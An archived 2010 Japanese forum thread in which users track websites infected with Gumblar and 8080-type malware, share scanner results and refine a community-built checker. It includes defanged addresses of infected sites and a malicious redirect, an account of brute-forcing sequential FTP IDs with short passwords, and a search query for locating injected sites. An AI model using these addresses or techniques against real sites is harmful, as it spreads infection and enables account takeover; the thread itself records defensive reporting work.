見慣れないexe実行を実行した形跡はログに無かったから確定してる

>$axxxxxxxx=xxxxxx;
この伏せた部分はFTPのIDとパスワードなんだが
自分のじゃなくて同じ鯖を利用している他人のIDとパスだった

うちの鯖はFTPのIDが英字3文字+数字4桁で規則性があって、
例えば始めに登録した奴がabc0001ならその次にアカウント登録した奴はabc0002になるって感じの連番

さらにはパスが適当な5桁のものに一定期間ごとに変わる(セキュリティ対策)って仕様だから
総当たりでいけば比較的簡単にIDとパスがわかる。

そんで今回自分はその5桁のまま変更していなかったからパスも短ければIDも規則性で簡単に推測できるって鯖に進入されたってこと

放置サイトでも油断できないな

285:名無しさん@お腹いっぱい。
10/02/12 11:32:01
「Adobe Reader」と「Flash Player」に深刻な脆弱性--アドビが警告
URLリンク(japan.cnet.com)

286:名無しさん@お腹いっぱい。
10/02/12 12:36:47
>>285
カスadobe潰れろ。マジ。

287:名無しさん@お腹いっぱい。
10/02/12 12:53:22
>>285
16日までゼロデイ脆弱性に怯えなきゃならんのか。
こないだ更新したばかりだというのに。

288:名無しさん@お腹いっぱい。
10/02/12 13:00:39
最終的にAdobeサイトも陥落したらどうなるの

289:名無しさん@お腹いっぱい。
10/02/12 13:01:15
>>286
Adobeとかまだ使ってんのお前?w

290:名無しさん@お腹いっぱい。
10/02/12 13:14:06
>>287
Flashはもう10.0.45.2が出ているよ。
Readerの方は17日まで待ち。

291:名無しさん@お腹いっぱい。
10/02/12 13:18:37
あらadobeって10.1まで待てみたいな記事あったけど
10.0の方で修正してくれたんだ
早速更新しよう

292:名無しさん@お腹いっぱい。
10/02/12 13:39:47
>あら
じゃねーよハゲ

293:名無しさん@お腹いっぱい。
10/02/12 13:53:16
ハ……ハハ禿ちゃうわ!

294:名無しさん@お腹いっぱい。
10/02/12 13:57:37
情弱「死ねカス」

295:名無しさん@お腹いっぱい。
10/02/12 14:16:46
禿げって髪の毛一本もない状態から地肌がかすかに見えてる状態、
更にはかつらと分かる状態までを包含するスケーラビリティ高い単語やね


296:名無しさん@お腹いっぱい。
10/02/12 14:21:43
そう考えると…ハゲじゃない人ってそう多くもなさそうだな

297:名無しさん@お腹いっぱい。
10/02/12 14:23:35
おれはボーボーだ!!

298:名無しさん@お腹いっぱい。
10/02/12 15:07:00 BE:10061388-2BP(1236)
>>283
whois ucom
めるぽ
whois ムームー

299:名無しさん@お腹いっぱい。
10/02/12 16:21:14
URLリンク(otokunatuuhan)●com/campaign/asp-hikaku

300:名無しさん@お腹いっぱい。
10/02/12 16:26:20
オトクナツウハン!w

301:名無しさん@お腹いっぱい。
10/02/12 17:24:19
>>290
お~、サンクスコ。
FLASHバージョンチェックの
下に表示されてる最新情報が
一つ前のままになってて
気がつかなかった。

302:名無しさん@お腹いっぱい。
10/02/12 17:31:18
aguse gatewayで感染サイトにアクセスしてしまった・・・アウトかな?

303:名無しさん@お腹いっぱい。
10/02/12 17:32:14
Flashを10.0.45.2にアップデートしてMyJVNチェッカでチェックしたら
最新じゃないって怒られた(´・ω・`)
せめて登録されてるのよりバージョンが上なら最新扱いしようぜ

304:名無しさん@お腹いっぱい。
10/02/12 17:32:23
せーふ

305:名無しさん@お腹いっぱい。
10/02/12 17:44:02
良かった。。。

306:名無しさん@お腹いっぱい。
10/02/12 17:51:16
>>299
そのページの下から二番目のバーナーの会社経由で連絡を入れるそうです。。

307:名無しさん@お腹いっぱい。
10/02/12 18:34:47
>>306
バーナーとかやめてよ
何燃やすんじゃ

308:名無しさん@お腹いっぱい。
10/02/12 18:41:27
>>297

309:名無しさん@お腹いっぱい。
10/02/12 18:57:15
せっかくボーボーの毛を燃しちゃうの?

310:名無しさん@お腹いっぱい。
10/02/12 18:58:43
禿 の ね た み か !

311:名無しさん@お腹いっぱい。
10/02/12 19:33:49
>>285
まだ脆弱性あんのか・・・

312:へたれ発掘屋
10/02/12 19:48:56
ver~が更に難読化しちょります(汁;
URLリンク(www)●rakushobito●jp/place

.replace(/[・・・.replace(/[・・・.replace(/[・・・.replace(/[・・・.replace(/[・・・.replace(/[・・・.replace(/[・・・;var

(;゚Д゚)・・・

313:名無しさん@お腹いっぱい。
10/02/12 19:53:52
いずれ正規コードと見分けることが限りなく困難になる予感

314:名無しさん@お腹いっぱい。
10/02/12 20:03:13
うわあなにそれ

315:名無しさん@お腹いっぱい。
10/02/12 20:04:47
>>312
Dr. Webたんが反応した
真っ赤

316:名無しさん@お腹いっぱい。
10/02/12 20:10:17
>>312
Gumblar Checker 3で対応しました。
URLリンク(gumblar.s1.dynamitelife.net)

317:名無しさん@お腹いっぱい。
10/02/12 20:20:40
>>311
旧バージョンから残った脆弱性+現バージョンの追加機能から発生する脆弱性があるわけだからな
それに修正したことで発生することもあるし完全にゼロにするのは不可能だよ

318:名無しさん@お腹いっぱい。
10/02/12 20:26:58
チェッカーも統合ってできないんですかね?

319:名無しさん@お腹いっぱい。
10/02/12 20:38:25
>>318
近いうちに統合します。
ただ、Gumblar.X Checkerのみ統合しない予定です。

320:名無しさん@お腹いっぱい。
10/02/12 20:44:12
ありがとうございます。期待してます。
aguseじゃでなかったりするし、いろんなチェッカーで調べるのが
めんどかったので

321:名無しさん@お腹いっぱい。
10/02/12 20:51:05
>>319
デコードできないもより
URLリンク(gumblar.s1.dynamitelife.net)

322:名無しさん@お腹いっぱい。
10/02/12 20:58:47
>>321
対応しました。

323:名無しさん@お腹いっぱい。
10/02/12 21:00:58
>>322
お疲れ様です。
ありがとうございました。

324:名無しさん@お腹いっぱい。
10/02/12 21:07:41
>>322
対応早いなあ
ほんと乙です

325:名無しさん@お腹いっぱい。
10/02/12 21:13:12
チェッカーってどれ?

326:名無しさん@お腹いっぱい。
10/02/12 21:21:02
www●rcsmovie●co●jp/
URLリンク(www.virustotal.com)

327:名無しさん@お腹いっぱい。
10/02/12 21:33:01
>>320
ウエブ検査で[Gumblarの可能性あり]というのがサイトイメージ下部に出てますよ
Gatewayじゃでないですね


328:名無しさん@お腹いっぱい。
10/02/12 21:46:37
>>326
そこ3回目じゃん
サイトから駆除しただけで更新に使用しているPCから駆除できてないんじゃないのか

329:名無しさん@お腹いっぱい。
10/02/12 21:48:17
lets-juken.comやっと死んだな。


330:名無しさん@お腹いっぱい。
10/02/12 21:50:21 BE:8489669-2BP(1236)
>>306
乙です。

>>312
めるぽしました。

>>326
( ゚Д゚)ポカーン

331:名無しさん@お腹いっぱい。
10/02/12 22:28:11
www●in-service●jp/
googlのセーフブラウジングに引っかかるね

332:名無しさん@お腹いっぱい。
10/02/12 22:30:28
>>331
www●in-service●jp/common●js
にGumblar.Xがかなり仕込まれてる

333:名無しさん@お腹いっぱい。
10/02/12 22:30:27
>>284
解説ありがとうございます。
少しだけ安心して、それ以上に怖くなった。
それ、もしかしてウチの職場が使ってる鯖と同じかな。
ランダムパスだから抜きにくいだろうけど、さらに複雑化してみる。

334:名無しさん@お腹いっぱい。
10/02/12 22:43:17
>>319
できればGumblarChecker 2を新型対応にする形で統合して欲しいなあ。
●をピリオドに自動置換する機能とか、使い勝手は3より2の方が優れているから。

335:名無しさん@お腹いっぱい。
10/02/12 22:46:22
本当にアドビとGumblar作ったやつと8080系作ったやつは死刑じゃ済まされないな

336:名無しさん@お腹いっぱい。
10/02/12 22:48:13
はい

337:名無しさん@お腹いっぱい。
10/02/12 23:04:18
Adobe以外のPDFソフトで感染したなんて人いるのかな

338:名無しさん@お腹いっぱい。
10/02/12 23:32:55
adobeはたかが更新するだけなのに
わざわざ変なインストーラーをインスコさせようとするから腹立つ
なにがgetplusだ

339:名無しさん@お腹いっぱい。
10/02/12 23:38:48
>>338
「ご存知ですか?

Adobeの悪口を一度投稿するたびに金1万円の請求が届きます。

また、投稿を削除したとしても課金され支払う義務が発生します。

支払いを無視した暁には(ry」という謎のレスを創造した俺はきっと病気

340:名無しさん@お腹いっぱい。
10/02/12 23:40:23
HDD容量、比較的狙われにくいマイナーさからみて
Foxit Reader、PDF X-change viewerに乗り換えた方が良いのだろうか

341:名無しさん@お腹いっぱい。
10/02/12 23:41:32
google docs

342:名無しさん@お腹いっぱい。
10/02/12 23:45:47
つーか、この期に及んで
自動更新期間のデフォルト値があり得ない数字だろ・・・

Flashは標準で一ヶ月
最短にしても一週間・・・
しかも、そのコンパネはネット上に・・・

毎日自動更新チェックするには設定ファイルを作る必要が・・・
URLリンク(itpro.nikkeibp.co.jp)

343:名無しさん@お腹いっぱい。
10/02/12 23:46:03
Foxitは軽いけど広告がウザイからお勧めしない

344:名無しさん@お腹いっぱい。
10/02/12 23:51:07
>>327
http:●www●rubbersoul.ne.jp/store/home.htm
ここがaguseじゃでないですね
チェッカー2だとでるんですが

345:名無しさん@お腹いっぱい。
10/02/12 23:51:57
>>335
尻叩き1万発

346:名無しさん@お腹いっぱい。
10/02/12 23:54:28
>>340
どちらも日本語化は完全なのかな・・・

347:名無しさん@お腹いっぱい。
10/02/13 00:03:10
Readerはそれなりのハード(メモリ量とGPU)と
レンダリング周りの設定を変更すれば、サクサクだと思う。
URLリンク(kb2.adobe.com)
・2D GPU アクセラレーションを使用
・ページキャッシュを使用

348:名無しさん@お腹いっぱい。
10/02/13 00:03:36
>>343
あんな小さな広告も許せないお前は何使っても同じ。

349:名無しさん@お腹いっぱい。
10/02/13 00:07:12
アバスト!だと反応しますが。
URLリンク(bukatsu.com)
URLリンク(www.eishinyobikou.com)

350:名無しさん@お腹いっぱい。
10/02/13 00:09:27
>>349
>>1
*** 危険と思われるサイトのアドレスはそのまま貼らないで「.」を「●」に変えてください ***

351:名無しさん@お腹いっぱい。
10/02/13 00:10:33
>>349
bukatsu.com
2重感染
eishinyobikou
同じく2重観戦

両方とも8080タイプのように見える・・・

で。URLは危険だから、.を●とかに置き換えようね><;

352:名無しさん@お腹いっぱい。
10/02/13 00:15:05
なんかaguseで検出されないのが増えてきたような・・・
チェッカー2だと検出されるけど

353:名無しさん@お腹いっぱい。
10/02/13 00:18:30
aguseの中身はカスペルスキーなんだから新しい物は検出しなくて当然

354:名無しさん@お腹いっぱい。
10/02/13 00:25:19
検出されないの理解しました
再感染サイトも多いけど感染サイトを貼りまくってるのがいて困る・・・

355:名無しさん@お腹いっぱい。
10/02/13 00:29:49
>>349
ウイルスにやられる予備校って嫌だなw

356:名無しさん@お腹いっぱい。
10/02/13 00:32:37
>>348
だなあ…
アフィとかのバナーが貼られまくったサイトとか見に行っちゃったら憤死するんだろうな

357:名無しさん@お腹いっぱい。
10/02/13 07:14:01
>>346
こんな感じで今のところ文字化けなどの不具合はないよ
URLリンク(www.dotup.org)

>>343
広告は非表示でおk

358:名無しさん@お腹いっぱい。
10/02/13 09:48:56
【やっぱり罠だった】 職業訓練の案内ページ改ざん!閲覧でウイルス感染か! URLリンク(www.ehdo.go.jp)
スレリンク(news板)

359:名無しさん@お腹いっぱい。
10/02/13 09:49:37 BE:7545986-2BP(1236)
>>331
whoisからめるぽとフォームからつーほー

>>349
さくら

>>283
>>298のucomから対応の返事がきてた。403を確認。

360:名無しさん@お腹いっぱい。
10/02/13 10:01:06
>>358
一週間前ぐらいに報告あったよなここ?

361:名無しさん@お腹いっぱい。
10/02/13 10:06:12
www●goldlane●co●jp
再感染 

362:名無しさん@お腹いっぱい。
10/02/13 10:19:34
>>361
復号に一部失敗していたので修正しました。

>>334
個人的にはGumblar Checker 3のコードの方がいじりやすいので多分Gumblar Checker 3を旧型8080系に対応する形で行くと思います。
●を自動変換する機能などは統合するまでには対応します。

363:名無しさん@お腹いっぱい。
10/02/13 10:36:58
・●を自動変換する機能
・http://やhttp://等を入力した際にhttp://を補充する機能
をGumblar Checker 3に追加しました。

URLリンク(gumblar.s1.dynamitelife.net)

364:名無しさん@お腹いっぱい。
10/02/13 10:57:38 BE:8803878-2BP(1236)
>>361
210.172.138.224
GMOにつーほー

365:名無しさん@お腹いっぱい。
10/02/13 11:54:03
Gumblar Checker 3で、
試験的に/*CODE1*/,/*LGPL*/,DEBUG(megaid固定)に対応しました。

URLリンク(gumblar.s1.dynamitelife.net)

366:名無しさん@お腹いっぱい。
10/02/13 12:09:57
>>365


367:名無しさん@お腹いっぱい。
10/02/13 12:14:01
>>365
本当にいつも乙です。

368:名無しさん@お腹いっぱい。
10/02/13 13:33:37
/*GNU GPL*/,/*handle exception*/,DEBUG改,/*Exception*/のコードに対応しました。

URLリンク(gumblar.s1.dynamitelife.net)

369:名無しさん@お腹いっぱい。
10/02/13 13:36:54
チェッカーは、3だけ使えばいいのかな?

370:名無しさん@お腹いっぱい。
10/02/13 13:44:10
>>368
janeのコマンドに登録したいんだけど、以下でおkですか?
Gumblar Checker 3=URLリンク(gumblar.s1.dynamitelife.net)

371:名無しさん@お腹いっぱい。
10/02/13 13:56:10
>>370
大丈夫です

372:名無しさん@お腹いっぱい。
10/02/13 14:05:46
>>371
これtってオリジナルのスクリプトのコードは表示できないの?
それを検体として送りたいので。
今は飛び先のチェックで抽出してるけど。

373:名無しさん@お腹いっぱい。
10/02/13 14:12:20
>>371
これってコード表示できないの?

374:名無しさん@お腹いっぱい。
10/02/13 14:13:16
>>372
なるほど、もしかしたら誤検出する対策ソフト出るかもしれませんが実験してみます。
少々お待ちください

375:名無しさん@お腹いっぱい。
10/02/13 14:14:25
>>370-371 自演ワロタw

376:名無しさん@お腹いっぱい。
10/02/13 14:29:17
>>374
一部表示を全角にするとか

377:名無しさん@お腹いっぱい。
10/02/13 14:52:04
コード表示させるようにしてみました
改行処理は面倒なのでしてませんが・・・

378:名無しさん@お腹いっぱい。
10/02/13 14:56:31
VirusTotalでチェックした所一部誤検出する対策ソフトがあったので一回停止します

379:名無しさん@お腹いっぱい。
10/02/13 15:06:42
日本語ドメインにも対応してほしいです。
puniに変換するのめんど(ry

380:名無しさん@お腹いっぱい。
10/02/13 15:07:35
まんま表示させたら駄目だろwww

381:名無しさん@お腹いっぱい。
10/02/13 15:59:46
■ 感染確認・駆除ツール
アンラボ(v3daonol.exe)
URLリンク(www.ahnlab.co.jp)
マカフィー(stinger.exe)
URLリンク(www.mcafee.com)
Kaspersky(KatesKiller.exe)
URLリンク(support.kaspersky.com)

Microsoft、trendmicro、McAfee・・・全部表示出来ないんだけどどうすれば良いですか?
Microsoft Updateもupdate出来ないし、オワタ?

382:名無しさん@お腹いっぱい。
10/02/13 16:09:06
Gumblar Checker 3の作者さん。
Gumblar.X Checkerもそうだけど、アドレス入力ボックスにあらかじめ入力されている http:// が
IE以外では意味ないのは仕様ですか?

383:名無しさん@お腹いっぱい。
10/02/13 16:16:44
>>379
今から組み込んでみます。少々お待ちください。

>>382
仕様ですがやっぱりアレなので変更しました。

384:名無しさん@お腹いっぱい。
10/02/13 16:37:22
日本語ドメインなんて使ってるやついるんだな

385:名無しさん@お腹いっぱい。
10/02/13 18:06:20
ごめんなさい、一応組み込んだんですが、今使用しているレン鯖が日本語ドメインをPunycodeに変換するモジュールが入ってないみたいなので対応できませんでした。

386:379
10/02/13 18:23:05
>>385
わざわざありがとうございます。
とりあえず自分で変換して使ってみます。

387:名無しさん@お腹いっぱい。
10/02/13 18:47:41
>>385
送信前にJavaScriptで変換汁

388:名無しさん@お腹いっぱい。
10/02/13 18:54:41
www●bamu7●com
www●camu7●com
www●eamu7●com
www●famu7●com
www●gamu7●com

こんなSEO目的の屑サイトが事態を悪くしている

389:名無しさん@お腹いっぱい。
10/02/13 19:01:49
>>388
8080?

390:名無しさん@お腹いっぱい。
10/02/13 19:12:25
URLリンク(www.aguse.jp)URLリンク(www.gred.jp)ってどっちが判定正しいんだ?

ここの以外でも確かめてみたくて

391:名無しさん@お腹いっぱい。
10/02/13 19:24:16
断然 aguse

392:名無しさん@お腹いっぱい。
10/02/13 19:25:54
>>387
おお、その手がありましたね。
ということで日本語ドメインに対応しました。日本語JPドメインを入れて「チェックする」ボタンを押すと勝手にPunycodeに変換してチェックします。
Enterキーでやると動作しません。

URLリンク(gumblar.s1.dynamitelife.net)

393:名無しさん@お腹いっぱい。
10/02/13 19:32:47
自前のgredよりカスペ頼りのaguseの方が優秀とは皮肉な

394:名無しさん@お腹いっぱい。
10/02/13 19:34:37
頼むぜ

395:名無しさん@お腹いっぱい。
10/02/13 19:34:55
>>388
www●camu7●comにある8080系コードに対応しました。
URLリンク(gumblar.s1.dynamitelife.net)

396:へたれ発掘屋
10/02/13 20:13:06
陥落さいと(最新型)釣れすぎwww
【びんぐ】
検索わーど:"var" "if(" ";var" "window" ".replace(/[" ";this."
URLリンク(www.bing.com)

---

MILLION PIXELS [WebDesign/DTP/Sound Production]
URLリンク(www)●millionpixels●com/webdesign/index●html
陥落サイトをデザインしてるとですか?



397:名無しさん@お腹いっぱい。
10/02/13 20:16:13
>>395
index.phpが何故か消えてたので再アップしました

398:名無しさん@お腹いっぱい。
10/02/13 20:20:16
>>397
パスワードが割れてる予感
鯖管の悪戯か?

399:名無しさん@お腹いっぱい。
10/02/13 20:21:48
こえーよ
大丈夫かよ
チェッカーでウイルス掛かるとかまじやだ・・

400:名無しさん@お腹いっぱい。
10/02/13 20:22:33
鯖のアンチウイルスが消したとか?

401:名無しさん@お腹いっぱい。
10/02/13 20:28:37
八苦されるようなチェッカーを作る奴は信用できない

402:名無しさん@お腹いっぱい。
10/02/13 20:37:00
レジストリチェックしましたが感染してないっぽです。
転送量や負荷をかけていると予告無しで消される、と規約にあるけどそれなのかな。
ファイルはすべてチェックしましたが感染しているとこはありませんでした。
次回も起きるようだったら鯖移転しようと思います。

>>400
もしかしたらそれかもしれないですね。

403:名無しさん@お腹いっぱい。
10/02/13 20:49:02
移転したほうがいいよ

404:名無しさん@お腹いっぱい。
10/02/13 20:50:29
うーん、もしかしたら鯖が暴走してるっぽい?

405:名無しさん@お腹いっぱい。
10/02/13 20:54:41
鯖が意思を持ち始めた
スカイネットの誕生である


406:名無しさん@お腹いっぱい。
10/02/13 21:04:47
HAL2010

407:名無しさん@お腹いっぱい。
10/02/13 21:07:15
人生、宇宙、すべての答えは?

408:名無しさん@お腹いっぱい。
10/02/13 21:07:22
42

409:名無しさん@お腹いっぱい。
10/02/13 21:09:59
23

410:名無しさん@お腹いっぱい。
10/02/13 21:13:12
分かる人向けのネタ多すぎww

411:名無しさん@お腹いっぱい。
10/02/13 21:15:16
全然わからんなw
関係ないけど死んだら14に行くって事はちゃんと知ってる

412:名無しさん@お腹いっぱい。
10/02/13 21:18:57
www●tanpopo-clinic●jp
カスペが反応しないけど改ざんされている

413:名無しさん@お腹いっぱい。
10/02/13 21:24:34
チェッカーだと検出するね

414:名無しさん@お腹いっぱい。
10/02/13 21:25:55
>>412
されてます
URLリンク(www.virustotal.com)

415:名無しさん@お腹いっぱい。
10/02/13 22:06:18
いちおうこっちのチェッカーも新しめのやつ検出できてるみたいです
URLリンク(ec2-204-236-148-61.us-west-1.compute.amazonaws.com)

416:名無しさん@お腹いっぱい。
10/02/13 22:09:59
>>415
大丈夫っぽいな

でも誰のサービスだ?

417:名無しさん@お腹いっぱい。
10/02/13 22:12:13
ここブロックされたけどなんかあります?
URLリンク(www.f.kpu-m.ac.jp)

418:名無しさん@お腹いっぱい。
10/02/13 22:17:43
>>417
Decryptor Generic (GJS063)感染
京都府立医科大学ねぇ~

419:名無しさん@お腹いっぱい。
10/02/13 22:18:51
>>417
それと、URLはh抜きだけじゃ危ない
.を●にしれ

420:名無しさん@お腹いっぱい。
10/02/13 22:30:41
2009年第1回駿台全国模試理系学部合格目標ライン 前期日程 国語補正済み

80 ●東京大理Ⅲ
79
78 ●京都大医
77
76 
75 ●大阪大医
74
73 東京医科歯科大医 ←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←
72 ●東北大医 千葉大医 ●九州大医 ●名古屋大医
71
70 京都府立医科大医 ★東京大理Ⅰ
69 ●北海道大医 ★東京大理Ⅱ
68 神戸大医 岡山大医 横浜市立大医 名古屋市立大医 大阪市立大医 
67 新潟大医 金沢大医 滋賀医科大医 広島大医 熊本大医 奈良県立医科大医 ★京都大薬
66 三重大医 長崎大医 札幌医科大医 ★京都大理
65 群馬大医 浜松医科大医 山口大医 愛媛大医 和歌山県立医科大医 北海道大獣医 ★京都大物理工
64 富山大医 福井大医 岐阜大医 徳島大医 鹿児島大医  
63 弘前大医 山形大医 山梨大医 信州大医 大分大医 九州大生命科学 ★京都大農
62 旭川医科大医 秋田大医 香川大医 琉球大医 福島県立医科大医 
61 大阪大薬 東京農工大獣医 
60 鳥取大医 佐賀大医 宮崎大医 東京医科歯科大歯 大阪大歯 帯広畜産獣医

421:名無しさん@お腹いっぱい。
10/02/13 22:33:16
矢印どうにかしてから貼れよ

422:名無しさん@お腹いっぱい。
10/02/13 22:33:40
>>417
www●f.kpu-m●ac●jp/k/dgstv-surg/index.html が感染
URLリンク(www.virustotal.com)

423:名無しさん@お腹いっぱい。
10/02/13 22:36:00
ところで感染するとどうなるんだい?

424:名無しさん@お腹いっぱい。
10/02/13 22:38:17
どっちが?

425:418
10/02/13 22:39:43
とりあえず大学だから連絡しておいた。

426:名無しさん@お腹いっぱい。
10/02/13 22:41:47
91●201●28●53/ztr/index.php?s=7a38815ea3cb6bf17d728f1d256da477
に飛ばされた
その先はシラネ

427:名無しさん@お腹いっぱい。
10/02/13 23:57:07 BE:943823-2BP(1236)
>>388,>>396
でじろ

>>412
whoisからめるぽしました。

>>425
乙です乙です。

428:名無しさん@お腹いっぱい。
10/02/14 00:23:52
サクラとかロリポップは連絡先がわかりやすいんだけど
デジロックとかOCNってどこから通報したらいいんだ?

429:名無しさん@お腹いっぱい。
10/02/14 00:28:41
URLリンク(www.tanpopo-clinic.jp)
ここって感染してる?
踏んでしまったんだが

430:名無しさん@お腹いっぱい。
10/02/14 00:29:52
>429
なんで直接貼るの?

431:名無しさん@お腹いっぱい。
10/02/14 00:30:23
クソバカが!直リンするなって書いてあるだろうが!テンプレよく見ろクズ虫!

432:名無しさん@お腹いっぱい。
10/02/14 00:33:10
わざとだろ

433:名無しさん@お腹いっぱい。
10/02/14 00:34:16
h抜いてすらいないし

434:名無しさん@お腹いっぱい。
10/02/14 01:00:29
>>429
>>412>>414

435:名無しさん@お腹いっぱい。
10/02/14 01:32:22 BE:2830829-2BP(1236)
>>428

でじろ
URLリンク(www.digirock.jp) -> URLリンク(www.digirock.jp)

おしん
URLリンク(www.ocn.ne.jp)
URLリンク(help.ocn.ne.jp)


さくら
URLリンク(secure.sakura.ad.jp)

ろりぽ
URLリンク(lolipop.jp)

436:名無しさん@お腹いっぱい。
10/02/14 01:43:04
なんかどれも萌えキャラの名前みたいに見える

437:名無しさん@お腹いっぱい。
10/02/14 06:16:29
>>224
quake_vnb●rshu●ru/index_eng●html
再発

438:名無しさん@お腹いっぱい。
10/02/14 09:44:22

kasori●seikei-kai●or●jp

439:名無しさん@お腹いっぱい。
10/02/14 09:51:23
>>437
対応しました。
URLリンク(gumblar.s1.dynamitelife.net)

440:名無しさん@お腹いっぱい。
10/02/14 09:54:54
>>439
URLミスです。
URLリンク(gumblar.s1.dynamitelife.net)URLリンク(gumblar.s1.dynamitelife.net)

441:名無しさん@お腹いっぱい。
10/02/14 10:17:03
URLリンク(www)●shisetsu-sc●co●jp/

442:名無しさん@お腹いっぱい。
10/02/14 11:05:35
>>437のソースが取得できないね

443:名無しさん@お腹いっぱい。
10/02/14 11:28:55
ちょっと前まで感染するとbase64で変換してPOSTでパスワード上げてたのに
最近は圧縮してんな、POSTで上げたり、SMTPで送ったりいろいろやってし。
だいぶ複雑になって来た。

俺と同じXPSP3使ってる奴は
最新のウィルス実行するとソフト全部最新にしても死ぬから気を付けろ。
まず実行されることはないと思うけど。

444:名無しさん@お腹いっぱい。
10/02/14 11:33:42
>>443
な・・・ん・・・だと・・・!?
XPSP3だと対策は現状無意味とでも言うのか?

これは7買えって言う事なのか・・・金ねぇよ・・・・・・

445:名無しさん@お腹いっぱい。
10/02/14 11:39:39
>>443
どういう事なの・・。
感染したサイト行ったりしたけど今のところ何の問題も無いぞ・・。


446:名無しさん@お腹いっぱい。
10/02/14 11:43:16
>>444
avast付けてここに出てるURL全部踏んでるけど
実行される前に止まってるから感染しない。
普通にやってる限りは止まってくれるんじゃないか?
すげぇー適当だけど。

447:名無しさん@お腹いっぱい。
10/02/14 11:55:43
>>446
いや、それで普通だからw
実行ファイルの実行場所がキャッシュやtempで、且つ明示的に実行した場合は
感染を防ぐのが難しいだけ

448:名無しさん@お腹いっぱい。
10/02/14 12:33:47
>>443
> 最新のウィルス実行すると

実行する前提ならソフトが最新かどうかなんて関係ないだろw
素人?

449:名無しさん@お腹いっぱい。
10/02/14 12:34:44
法政大学社会学部(旧公式サイト)
おそらく公式サイト移行で管理放棄されたサイト

URLリンク(soc)<)●jpn●org/soc03
URLリンク(soc)<)●jpn●org/soc05
以下略


450:名無しさん@お腹いっぱい。
10/02/14 12:36:48
>>448
もしかしてアホ?

451:名無しさん@お腹いっぱい。
10/02/14 12:38:27
==========ここまで俺の自作自演==========

452:名無しさん@お腹いっぱい。
10/02/14 12:41:44
最近定義ファイルよりもヒューリスティックでブロックするケースが多くなってきた。

セキュリティソフト2本併走中
(定義2本 ヒューリスティック2本)


453:へたれ発掘屋
10/02/14 12:44:56
既出ご容赦&上の階層は調べてないのです(多すぎるから)

URLリンク(www)<)●palmjp●com/index5●html
URLリンク(whitetiger)<)●boom-k●com/poor-athlete-japan
URLリンク(www.goldlane)<)●damu7●com/kaisiha
URLリンク(www)<)●jpn●org/soc05/kyouju/kinter
URLリンク(www)<)●hotel-saint-paul-saint-germain-paris●com/nomuikumou
URLリンク(viennaoptimist)●org

つーほー&検体提出ヨロ。 発掘作業に戻る......

454:名無しさん@お腹いっぱい。
10/02/14 12:45:47
Gumblar Checker 3で、8080系と判定されたコードを表示するようにしました。
誤検出対策のため、以下の文字を全角にしています。
( → (      ) → )      / → /
「コードを表示」というボタンを押すと、コードが出るようになります。

URLリンク(gumblar.s1.dynamitelife.net)

455:名無しさん@お腹いっぱい。
10/02/14 13:20:30
>>453
URLリンク(soc)<)●org

にあるタイプに対応しました。
URLリンク(gumblar.s1.dynamitelife.net)

456:名無しさん@お腹いっぱい。
10/02/14 13:29:32
URLリンク(soc)<)

457:名無しさん@お腹いっぱい。
10/02/14 13:34:04
>>449
それは法政大学社会学部公式サイトで今まで掲載された物を年度別に仕分けたページと思われる
上記公式サイト上からリンク有り

458:名無しさん@お腹いっぱい。
10/02/14 13:38:35
とにかく、どのHPもここんこチェッカーを通してからじゃないと
アクセスできねぇよ。なんだよこの不安感。ブラスターで
攻撃されまくってた98時代を思い出す。ハンパネェ。

459:名無しさん@お腹いっぱい。
10/02/14 14:24:32
ブラスターなのに98???

460:へたれ発掘屋
10/02/14 14:34:48
>>456
乙です。
--
朝日オート(再再再再再再再再再再再再再再再再再再再再再・・・改竄)
URLリンク(sunrise)●2pg●in/

( ゚Д゚) <!--<script>-->

カスサイトは消滅してほしいのです・・・

461:名無しさん@お腹いっぱい。
10/02/14 14:46:39
>>460
ひでーな…もう行政指導か何かでもしないと直らないんじゃないか?
まあ行政指導する側もあんまり理解してなさそうだが

462:名無しさん@お腹いっぱい。
10/02/14 14:47:27
だれか通報連絡メールのテンプレ作って。

自分の文章じゃ相手に分かってもらえないような気がしてきた…

自分の↓
---------------------
こんにちは

こちらのサイトを閲覧していたのですが、(タイトル)のページ(URL)に不審な動きがみられました。
おそらく(8080 or Gumblar)系のウイルスに感染していると思われます。

最近は、改ざん系のウイルスが流行しているので、念のため確認していただこうと思いメール差し上げました。
参考までにIPAの解説サイトです。
URLリンク(www.ipa.go.jp)

また、次のサービスでチェックすることができます。
URLリンク(www.aguse.jp) URLリンク(www.gred.jp)

こちらの勘違いであれば申し訳ございません。
それでは、失礼しました。

463:名無しさん@お腹いっぱい。
10/02/14 14:51:08
>>462
ソネットセキュリティのアドレスも書いた方がよくね?

464:名無しさん@お腹いっぱい。
10/02/14 14:52:41
とりあえずさくらたんとサイトの管理人にメールした。
whitetiger。sakura。ne。jp

465:名無しさん@お腹いっぱい。
10/02/14 14:54:48
gredもaguseも最近発見率が下がってる気がするのは俺だけか

466:名無しさん@お腹いっぱい。
10/02/14 15:00:28
こんな内容で送ってます~。
感染している方々はPCに疎いことが考えられるんでチェックサービスでカスペルスキーなんて出たら「駆除済み」と思われかねないかと。

突然のメール失礼いたします。
わたくし●●と申します。

2010/2/13 21:00現在
貴サイトにおいて
「ガンブラー攻撃」に分類される疑いのあるスクリプト(HP用の命令文)を確認いたしております。
アクセス時はご注意ください
「 URLリンク(****.**.**) 」

●以下のことが考えられます。
ホームページ管理を行っているパソコンがウイルスに感染。
(外注している場合、同一PCで製作している複数のホームページへ感染)
個人情報がインターネット上に流出している。
ホームページ訪問者への感染拡大。
至急対策を講じられますことをお奨めいたします。
●対策(可及的すみやかに)
①パソコンからのウイルス駆除
②Windowsなどのソフトウエアの更新
③セキュリティソフトの導入
④ホームページパスワードの変更
⑤ウイルス感染告知の掲載&ホームページからのスクリプト除去(クリーニング)
ご自身で対応できない場合、【絶対に放置せず】詳しい方に対応してもらってください。
尚、既に対応済みであった場合はご容赦ください。

467:名無しさん@お腹いっぱい。
10/02/14 15:01:39
>>460
URLリンク(s1)●shard●jp/dreaming/mitubishiucar/index●html
こっちは気付いてないのかしらん

468:名無しさん@お腹いっぱい。
10/02/14 15:04:40
>>465
アグセ(ウエブのほう)は検出しなくても下部リンクに赤字でスクリプト記載がでますよ
亜種が多くてパターンファイル頼みじゃ限界の予感

469:名無しさん@お腹いっぱい。
10/02/14 15:06:29
>>467
Gumblar Checker 3で対応しました。


470:名無しさん@お腹いっぱい。
10/02/14 15:08:44
通報した人って返信メールとかお礼的なメールってもらって事ありますか?
連絡してもさっぱりどういう対応なのか分からない・・・

471:名無しさん@お腹いっぱい。
10/02/14 15:14:54
>>470
